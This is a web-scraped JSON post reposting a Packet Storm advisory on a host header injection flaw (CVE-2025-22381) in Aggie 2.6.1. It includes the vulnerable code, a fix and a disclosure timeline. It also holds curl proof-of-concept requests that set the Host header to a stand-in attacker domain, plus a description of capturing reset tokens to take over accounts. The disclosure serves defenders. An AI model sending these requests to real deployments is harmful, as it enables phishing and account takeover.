{"id":38573,"date":"2026-02-02T13:42:32","date_gmt":"2026-02-02T13:42:32","guid":{"rendered":"http:\/\/localhost\/?p=38573"},"modified":"2026-02-02T13:42:32","modified_gmt":"2026-02-02T13:42:32","slug":"aggie-261-host-header-injection","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=38573","title":{"rendered":"\ud83d\udcc4 Aggie 2.6.1 Host Header Injection_PACKETSTORM:214735"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-02-02T18:38:50&#8243;,&#8221;description&#8221;:&#8221;This is a detailed analysis and proof of concept exploit for CVE-2025-22381, a host header injection vulnerability discovered in Aggie version 2.6.1&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-02-02T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-02-02T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 Aggie 2.6.1 Host Header Injection&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:214735&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2025-22381&#8243;],&#8221;sourceData&#8221;:&#8221;CVE-2025-22381: Host Header Injection in Aggie\\n    \\n    Detailed analysis and Proof-of-Concept for CVE-2025-22381, a Host Header Injection vulnerability discovered in the Aggie Open-Source Project.\\n    \\n    \\n    *************************\\n    *************************\\n    Vulnerability Overview+\\n    *************************\\n    *************************\\n    \\n    \\n    CVE ID: CVE-2025-22381\\n    \\n    Published: October 2025 (MITRE assignment)\\n    \\n    Disclosed publicly: February 2026\\n    \\n    Reporter: Anas Abderrahman Benbarek\\n    \\n    Discovery Date: September 17, 2025\\n    \\n    Affected Project: TID-Lab\/aggie\\n    \\n    Affected Versions: All versions (including 2.6.1 and earlier; no fix applied as of February 2026)\\n    \\n    
Severity: Medium to High (estimated CVSS ~7.1\u20137.5)\\n    \\n    Impact: Enables phishing attacks leading to password reset token theft and potential account takeover.\\n    \\n    \\n    *************************\\n    *************************\\n    Background\\n    *************************\\n    *************************\\n    \\n    \\n    \\n    I spend a fair amount of time reviewing open source Node.js projects on GitHub, especially ones that handle authentication flows. In September 2025, while looking through the Aggie repository, I noticed something that immediately stood out in the password reset logic. What started as routine code reading ended up becoming CVE-2025-22381 \u2014 a classic Host Header Injection vulnerability that allows an attacker to control the domain in password reset emails.\\n    \\n    \\n    *************************\\n    *************************\\n    How I Found It\\n    *************************\\n    *************************\\n    \\n    \\n    I cloned the repository and started reading files under lib\/api\/, focusing on anything related to authentication and email generation.\\n    \\n    The file lib\/api\/reset-password.js contains the endpoint logic for \/reset-password. The critical part is inside the sendEmail helper:\\n    \\n    function sendEmail(user, req, callback) {\\n      var token = encodeToken(user);\\n    \\n      mailer.sendFromTemplate({\\n        template: &#8216;forgotPassword&#8217;,\\n        user: user,\\n        token: token,\\n        host: req.headers.host,          \/\/ \u2190 vulnerable\\n        protocol: req.protocol,\\n        acceptLanguage: req.headers[&#8216;accept-language&#8217;]\\n      }, callback);\\n    }\\n    \\n    \\n    The line host: req.headers.host is the problem. In Express, req.headers.host comes directly from the Host HTTP header, which is entirely attacker-controlled. 
There is no validation, no whitelist, no fallback to a trusted domain from configuration.\\n    \\n    \\n    *************************\\n    *************************\\n    Initial Confirmation\\n    *************************\\n    *************************\\n    \\n    \\n    I quickly set up a local instance following the README instructions (Ubuntu, nvm, npm install, secrets.json with test SMTP), started the server, and triggered a password reset. The generated email link used localhost:3000 as expected.\\n    \\n    Then I replayed the request with a manipulated Host header:\\n    \\n    curl -X POST http:\/\/localhost:3000\/reset-password \\\\\\n      -H \\&#8221;Host: evil-phish.example\\&#8221; \\\\\\n      -d \\&#8221;email=test@victim.com\\&#8221;\\n    \\n    \\n    The email (captured via MailHog) contained:\\n    http:\/\/evil-phish.example\/reset-password?token=&#8230;\\n    \\n    Proof positive. The application trusts the client-supplied Host header when building the reset link.\\n    \\n    \\n    *************************\\n    *************************\\n    How the Attack Actually Works\\n    *************************\\n    *************************\\n    \\n    \\n    \\n    Attacker sends a password reset request for a victim\u2019s email address, but sets the Host header to a domain they control (e.g. 
evil-phish.example).\\n    \\n    Aggie generates a legitimate reset token (server-side, time-limited, encrypted with the config secret).\\n    \\n    The email is sent containing a link to the attacker\u2019s domain instead of the real one.\\n    \\n    Victim receives the email and clicks the link (phishing success condition).\\n    \\n    The victim lands on the attacker\u2019s server.\\n    \\n    The attacker\u2019s server can:\\n    \\n    Simply display a fake \u201creset failed\u201d page and silently discard the token, or\\n    \\n    Capture the token from the query string (via server-side logging or JavaScript), or\\n    \\n    Proxy the request to the real Aggie instance, capture the token, and forward the user to the legitimate reset page (so the victim doesn\u2019t immediately notice anything wrong).\\n    \\n    Attacker later uses the captured token on the real domain to reset the victim\u2019s password.\\n    \\n    The key point: Host header injection alone does not let the attacker use the token directly. The attacker still needs the victim to visit the malicious link so the token reaches the attacker\u2019s infrastructure. 
That\u2019s why this is a phishing-enabling vulnerability rather than a direct account takeover without user interaction.\\n    \\n    \\n    *************************\\n    *************************\\n    Technical Severity \\u0026 Impact\\n    *************************\\n    *************************\\n    \\n    \\n    This is a medium-to-high severity issue depending on context:\\n    \\n    AV:N: Network reachable\\n    \\n    PR:N: No privileges required\\n    \\n    AC:L: Low complexity\\n    \\n    UI:R: Requires user interaction\\n    \\n    S:C: Scope can change (impact extends to the victim\u2019s account on the legitimate domain)\\n    \\n    C:L \/ I:H: Confidentiality \\u0026 Integrity impact on the victim\u2019s account\\n    \\n    Many databases list it in the CVSS ~7.1\u20137.5 range. I personally consider it serious in production environments where Aggie is used for sensitive monitoring (elections, crises), as successful phishing here can lead to full account takeover.\\n    \\n    \\n    \\n    *************************\\n    *************************\\n    Proof-of-Concept (Detailed \\u0026 Reproducible)\\n    *************************\\n    *************************\\n    \\n    \\n    Environment\\n    \\n    Ubuntu 18.04\/20.04 (as recommended)\\n    \\n    Node 12.16 (per .nvmrc)\\n    \\n    MailHog: Running locally for email capture (docker run -d -p 8025:8025 -p 1025:1025 mailhog\/mailhog)\\n    \\n    Aggie configured with email.transport pointing to localhost:1025\\n    \\n    Step-by-step\\n    \\n    Clone \\u0026 start Aggie:\\n    \\n    git clone https:\/\/github.com\/TID-Lab\/aggie.git\\n    cd aggie\\n    nvm install\\n    npm install\\n    cp config\/secrets.json.example config\/secrets.json\\n    # edit secrets.json \u2192 set adminPassword, add test SMTP if needed\\n    npm start\\n    \\n    \\n    Create a test user via the web UI or directly in MongoDB.\\n    \\n    Trigger malicious 
reset:\\n    \\n    curl -i -X POST http:\/\/localhost:3000\/reset-password \\\\\\n      -H \\&#8221;Host: evil-phish.example\\&#8221; \\\\\\n      -H \\&#8221;Content-Type: application\/x-www-form-urlencoded\\&#8221; \\\\\\n      -d \\&#8221;email=test@victim.com\\&#8221;\\n    \\n    Open MailHog: Inspect the sent email. The reset link will point to http:\/\/evil-phish.example\/reset-password?token=&#8230;\\n    \\n    \\n    *************************\\n    *************************\\n     Disclosure Timeline\\n    *************************\\n    *************************\\n    \\n    Sep 17, 2025: Discovered + local PoC\\n    \\n    Sep 17, 2025: Emailed mikeb@cc.gatech.edu with full details and PoC\\n    \\n    Sep 17, 2025: Submitted to MITRE (service request 1926730 \/ MCID15453119)\\n    \\n    Oct 9, 2025: MITRE assigned CVE-2025-22381\\n    \\n    Oct\u2013Dec 2025: No public patch or response observed\\n    \\n    Feb 2026: Public disclosure (this article)\\n    \\n    \\n    *************************\\n    *************************\\n    Recommended Fix\\n    *************************\\n    *************************\\n    \\n    \\n    \\n    Code Change\\n    \\n    Replace the vulnerable line with a trusted value in lib\/api\/reset-password.js:\\n    \\n    \/\/ In lib\/api\/reset-password.js, inside sendEmail()\\n    const config = require(&#8216;..\/..\/config\/secrets&#8217;).get();\\n    \\n    \/\/ Option A: Hard trust config value (recommended for single-domain)\\n    const host = config.appHost || &#8216;localhost:3000&#8217;;\\n    \\n    \/\/ Then use it:\\n    mailer.sendFromTemplate({\\n      template: &#8216;forgotPassword&#8217;,\\n      user: user,\\n      token: token,\\n      host: host, \/\/ Use the trusted variable\\n      protocol: config.environment === &#8216;production&#8217; ? 
&#8216;https&#8217; : req.protocol,\\n      acceptLanguage: req.headers[&#8216;accept-language&#8217;]\\n    }, callback);\\n    \\n    \\n    Configuration\\n    \\n    Add to secrets.json:\\n    \\n    \\&#8221;appHost\\&#8221;: \\&#8221;your-real-domain.com\\&#8221;\\n    \\n    \\n    *************************\\n    *************************\\n    Closing Thoughts\\n    *************************\\n    *************************\\n    \\n    \\n    Host header injection remains surprisingly common in 2025\u20132026, especially in projects that were started years ago and haven\u2019t been heavily audited. Aggie is a valuable tool for civic tech and crisis monitoring \u2014 I hope the maintainers apply a fix soon.\\n    \\n    If you maintain or use Aggie, check your deployment and patch manually until an official release lands. Feel free to reach out if you have questions or want to discuss similar issues in other projects.\\n    \\n    Thanks for reading and stay safe out 
there.&#8221;,&#8221;sourceHref&#8221;:&#8221;https:\/\/packetstorm.news\/download\/214735&#8243;,&#8221;cvss&#8221;:{&#8220;score&#8221;:8.2,&#8221;severity&#8221;:&#8221;HIGH&#8221;,&#8221;vector&#8221;:&#8221;CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:N\/A:L&#8221;,&#8221;version&#8221;:&#8221;3.1&#8243;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/packetstorm.news\/files\/id\/214735\/&#8221;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-02-02T
18:38:50&#8243;,&#8221;description&#8221;:&#8221;This is a detailed analysis and proof of concept exploit for CVE-2025-22381, a host header injection vulnerability discovered in Aggie version 2.6.1&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-02-02T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-02-02T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 Aggie 2.6.1 Host&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,77,12,15,13,53,7,11,5],"class_list":["post-38573","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-82","tag-exploit","tag-high","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>\ud83d\udcc4 Aggie 2.6.1 Host Header Injection_PACKETSTORM:214735 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=38573\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 Aggie 2.6.1 Host Header Injection_PACKETSTORM:214735 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2026-02-02T18:38:50&#8243;,&#8221;description&#8221;:&#8221;This is a detailed analysis and proof of concept exploit for CVE-2025-22381, a host header injection vulnerability discovered in Aggie version 
2.6.1&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-02-02T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-02-02T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 Aggie 2.6.1 Host...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=38573\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-02-02T13:42:32+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"7 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=38573#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=38573\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 Aggie 2.6.1 Host Header 
Injection_PACKETSTORM:214735\",\"datePublished\":\"2026-02-02T13:42:32+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=38573\"},\"wordCount\":1393,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"CVSS-8.2\",\"exploit\",\"HIGH\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=38573#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=38573\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=38573\",\"name\":\"\ud83d\udcc4 Aggie 2.6.1 Host Header Injection_PACKETSTORM:214735 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-02-02T13:42:32+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=38573#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=38573\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=38573#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 Aggie 2.6.1 Host Header Injection_PACKETSTORM:214735\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero 
redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. 
-->","yoast_head_json":{"title":"\ud83d\udcc4 Aggie 2.6.1 Host Header Injection_PACKETSTORM:214735 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=38573","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 Aggie 2.6.1 Host Header Injection_PACKETSTORM:214735 - zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2026-02-02T18:38:50&#8243;,&#8221;description&#8221;:&#8221;This is a detailed analysis and proof of concept exploit for CVE-2025-22381, a host header injection vulnerability discovered in Aggie version 2.6.1&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-02-02T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-02-02T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 Aggie 2.6.1 Host...","og_url":"https:\/\/zero.redgem.net\/?p=38573","og_site_name":"zero redgem","article_published_time":"2026-02-02T13:42:32+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. 
reading time":"7 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=38573#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=38573"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 Aggie 2.6.1 Host Header Injection_PACKETSTORM:214735","datePublished":"2026-02-02T13:42:32+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=38573"},"wordCount":1393,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","CVSS-8.2","exploit","HIGH","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=38573#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=38573","url":"https:\/\/zero.redgem.net\/?p=38573","name":"\ud83d\udcc4 Aggie 2.6.1 Host Header Injection_PACKETSTORM:214735 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-02-02T13:42:32+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=38573#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=38573"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=38573#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 Aggie 2.6.1 Host Header Injection_PACKETSTORM:214735"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero 
redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/38573","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=38573"}],"version-history":[{"count":0,"href":"htt
ps:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/38573\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=38573"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=38573"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=38573"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}